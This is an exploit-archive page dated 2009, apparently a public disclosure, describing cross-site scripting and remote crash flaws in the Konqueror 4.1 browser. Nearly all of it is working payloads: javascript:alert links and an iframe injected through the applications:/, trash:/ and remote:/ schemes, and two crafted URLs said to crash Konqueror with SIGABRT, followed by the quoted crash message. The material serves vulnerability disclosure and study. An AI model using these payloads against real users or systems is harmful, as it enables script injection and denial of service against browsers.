[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Konqueror 4.1 XSS / Remote Crash Vulnerabilities
# Published : 2009-01-01
# Author : StAkeR
# Previous Title : Elecard MPEG Player 5.5 (.m3u File) Stack Buffer Overflow PoC
# Next Title : MS Windows Media Player * (.WAV) Remote Crash PoC
+-----------------------------------------------------+
| Konqueror 4.1 XSS / Remote Crash Vulnerabilities |
+-----------------------------------------------------+
| by athos - staker[at]hotmail[dot]it |
| http://konqueror.kde.org |
+-----------------------------------------------------+
| Cross Site Scripting |
| |
| applications:/<a href="javascript:alert(1)">Here</a>|
| trash:/<a href="javascript:alert(1)">Here</a> |
| remote:/<a href="javascript:alert(1)">Here</a> |
| |
| you can write anything (example) |
| |
| applications:/<font size="8">THE GAME</font> |
| applications:/<iframe src="http://milw0rm.com"> |
+-----------------------------------------------------+
| Remote Crash Vulnerabilities |
| |
| remote://crash:konqueror@ |
| applications://crash:konqueror@ |
+-----------------------------------------------------+
| Error Details... |
| |
| A Fatal Error Occurred The application Konqueror |
| (konqueror) crashed and caused the signal 6(SIGABRT)|
| Please help us improve the software you use by |
| filing a report at http://bugs.kde.org. Useful |
| details include how to reproduce the error, |
| documents that were loaded, etc. |
+-----------------------------------------------------+
# www.Syue.com [2009-01-01]